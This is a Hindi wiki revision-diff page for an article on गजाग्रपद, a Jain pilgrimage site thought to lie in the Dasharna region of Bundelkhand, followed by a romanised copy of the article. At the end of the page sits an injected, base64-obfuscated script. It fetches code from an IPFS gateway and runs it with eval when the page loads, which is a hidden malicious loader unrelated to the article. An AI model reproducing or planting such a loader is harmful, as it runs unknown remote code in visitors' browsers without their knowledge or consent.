Difference between revisions of "गजाग्रपद"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''गजाग्रपद''' की गणना जैन साहित्य के अति प्राचीन आगम ...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
'''गजाग्रपद''' की गणना [[जैन साहित्य]] के अति प्राचीन आगम ग्रंथ 'एकादशअंगादि' में उल्लिखित [[जैन]] [[तीर्थ|तीर्थों]] में है। इसकी स्थिति दशार्ण कुट में बताई गई है, जो [[संस्कृत]] में प्रसिद्ध [[दशार्ण (मध्य प्रदेश)|दशार्ण]] देश ([[बुंदेलखंड]] का भाग) हो सकता है।
+
'''गजाग्रपद''' की गणना [[जैन साहित्य]] के अति प्राचीन आगम ग्रंथ 'एकादशअंगादि' में उल्लिखित [[जैन]] [[तीर्थ|तीर्थों]] में है। इसकी स्थिति दशार्ण कुट में बताई गई है, जो [[संस्कृत]] में प्रसिद्ध [[दशार्ण (मध्य प्रदेश)|दशार्ण]] देश ([[बुंदेलखंड]] का भाग) हो सकता है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= |संपादन= |पृष्ठ संख्या=273|url=}}</ref>
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= |संपादन= |पृष्ठ संख्या=273|url=}}
 
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==

Latest revision as of 05:48, 8 November 2012

gajagrapad ki ganana jain sahity ke ati prachin agam granth 'ekadashaangadi' mean ullikhit jain tirthoan mean hai. isaki sthiti dasharn kut mean bataee gee hai, jo sanskrit mean prasiddh dasharn desh (buandelakhand ka bhag) ho sakata hai.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |prishth sankhya: 273 |

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>